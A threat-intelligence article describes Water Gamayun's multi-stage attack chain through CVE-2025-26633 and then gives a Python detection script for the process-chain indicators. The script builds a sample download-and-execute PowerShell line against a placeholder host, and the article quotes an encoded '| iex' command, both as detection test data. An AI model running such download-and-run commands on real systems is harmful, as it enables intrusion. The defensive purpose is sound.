Water Gamayun, an advanced persistent threat group, has recently intensified its operations by exploiting the MSC EvilTwin vulnerability (CVE-2025-26633) in Windows systems.
The campaign is marked by multi-stage attacks against enterprise and government organizations, aimed at stealing sensitive information and credentials and at maintaining long-term access to compromised networks.
Emerging in 2025, these attacks combine techniques such as abuse of trusted binaries and heavy obfuscation to bypass modern security controls, while presenting users with convincing lures such as fake job documents.
The attack begins with a user's web search landing on a compromised website. That site silently redirects the victim to a lookalike domain, which delivers a malicious RAR archive disguised as a PDF (named "hiringassistant.pdf.rar").
MSC Payload Disguised as PDF (Source – Zscaler)
When the user opens the archive, the embedded payload exploits the MSC EvilTwin vulnerability by dropping a crafted .msc console file. mmc.exe loads that file, and abuse of TaskPad commands inside it triggers hidden PowerShell execution.
Zscaler security analysts noted that the campaign's distinctive approach chains password-protected archives, window-hiding code, and staged payload execution to hide its activity from both users and automated detection tools.
The Zscaler research team attributed the campaign to Water Gamayun on the basis of several strong indicators, including the uncommon abuse of the EvilTwin vulnerability, custom PowerShell obfuscation, and the use of decoy documents to lower suspicion.
Their analysis showed that, after establishing an initial foothold, the malware chain relies on downloaded executables, archive extraction, and process injection to expand its reach.
Multi-Stage Payload and Hidden Execution
At the core of Water Gamayun's methodology is a layered infection process. After the disguised RAR archive is opened, the payload writes an .msc file to disk.
When that file is executed, mmc.exe parses its malicious snap-in data and runs encoded PowerShell via TaskPad. This first-stage PowerShell script downloads legitimate tools such as UnRAR.exe and then extracts password-protected archives containing further payloads.
The scripts execute commands of the form:
-EncodedCommand JABX… | iex
A second-stage script compiles a .NET module to hide the malware's windows from view, opens a decoy PDF, and drops the final loader executable, ItunesC.exe. This loader provides long-term persistence by launching multiple instances of itself and concealing network beacons to external IP addresses.
The campaign shows how heavy obfuscation and multi-phase execution can evade detection. Defenders should monitor for unusual file extensions (a document extension followed by an archive extension), encoded PowerShell invocations, suspicious process chains such as mmc.exe spawning powershell.exe, and network activity to related infrastructure.
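The indicators above (a document-named archive, mmc.exe loading a console file from a user-writable path, mmc.exe spawning PowerShell with an encoded command) can be turned into a small detection pass over process-creation telemetry. The script below is an added example written for this article, not code from Zscaler or from the campaign. It runs over a handful of constructed Sysmon-style events (the field names Image, ParentImage and CommandLine, the victim paths, the update.msc file name and the stage.example.invalid host are all assumptions) and decodes any -EncodedCommand argument, which PowerShell expects as base64 of the script's UTF-16LE bytes. That encoding is also why the JABX… fragment quoted above is telling: those four base64 characters encode the bytes 24 00 57, the UTF-16LE text `$W`, so the obfuscated script begins with a variable whose name starts with W. The constructed first stage below begins the same way, so its encoded form shares that prefix.

```python
import base64
import re

# Regexes for the indicators the article describes.
# PowerShell accepts unambiguous prefixes of -EncodedCommand; -e, -ec and -enc are the
# abbreviations seen most often. The flag must be followed by whitespace, so
# -ExecutionPolicy and -ep do not match.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
# A document extension immediately followed by an archive extension, e.g. report.pdf.rar.
DOC_THEN_ARCHIVE = re.compile(r"(?i)\.(?:pdf|docx?|xlsx?|pptx?)\.(?:rar|zip|7z)$")
# .msc console files launched from locations an ordinary user can write to.
USER_WRITABLE_MSC = re.compile(r'(?i)\\(?:users|programdata)\\[^"]*\.msc')
# Tokens in a decoded script that indicate download-and-run behaviour.
SCRIPT_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile", "unrar")


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script, or None if there is none.

    PowerShell expects the argument to be base64 of the script's UTF-16LE bytes."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_doc_disguised_archive(path):
    """True for names such as hiringassistant.pdf.rar: an archive posing as a document."""
    return DOC_THEN_ARCHIVE.search(path.rsplit("\\", 1)[-1]) is not None


def classify_event(event):
    """Return the list of rules a process-creation event trips (empty if none)."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    # Rule 1: a console file should never need to start a shell.
    if parent.endswith("\\mmc.exe") and image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        reasons.append("powershell spawned by mmc.exe")
    # Rule 2: built-in consoles live under System32; a dropped one lives under the profile.
    if image.endswith("\\mmc.exe") and USER_WRITABLE_MSC.search(cmd):
        reasons.append("mmc.exe loading .msc from user-writable path")
    # Rule 3: decode the encoded command and look inside it.
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        hits = [t for t in SCRIPT_TOKENS
                if re.search(r"\b" + re.escape(t) + r"\b", decoded, re.I)]
        if hits:
            reasons.append("decoded script contains " + ", ".join(hits))
    # Rule 4: a document-named archive anywhere on the command line.
    for token in re.findall(r'[^\s"]+', cmd):
        if is_doc_disguised_archive(token):
            reasons.append("double extension " + token.rsplit("\\", 1)[-1])
            break
    return reasons


def scan(events):
    """Map the index of every flagged event to the rules it tripped."""
    flagged = {}
    for i, event in enumerate(events):
        reasons = classify_event(event)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed first-stage script standing in for the campaign's; the host is a placeholder.
STAGE1 = "$W=New-Object Net.WebClient;iex $W.DownloadString('http://stage.example.invalid/s1.ps1')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode()

# Constructed Sysmon-style process-creation events (not real telemetry; paths are invented).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\victim\Downloads\hiringassistant.pdf.rar"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\victim\AppData\Local\Temp\update.msc"'},
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED},
    # Two benign events that must not fire: a built-in console and a plain script file.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Windows\System32\eventvwr.msc"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS).items():
        name = SAMPLE_EVENTS[index]["Image"].rsplit("\\", 1)[-1]
        print(index, name, "->", "; ".join(reasons))
```

Run as a script it prints the three malicious events with the rules each tripped and stays silent on the two benign ones. The rules are deliberately narrow: the mmc.exe parent check and the user-writable .msc path check both depend on the process chain, not on any hash or file name, so they survive the actor renaming the dropped console or rotating its download host.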
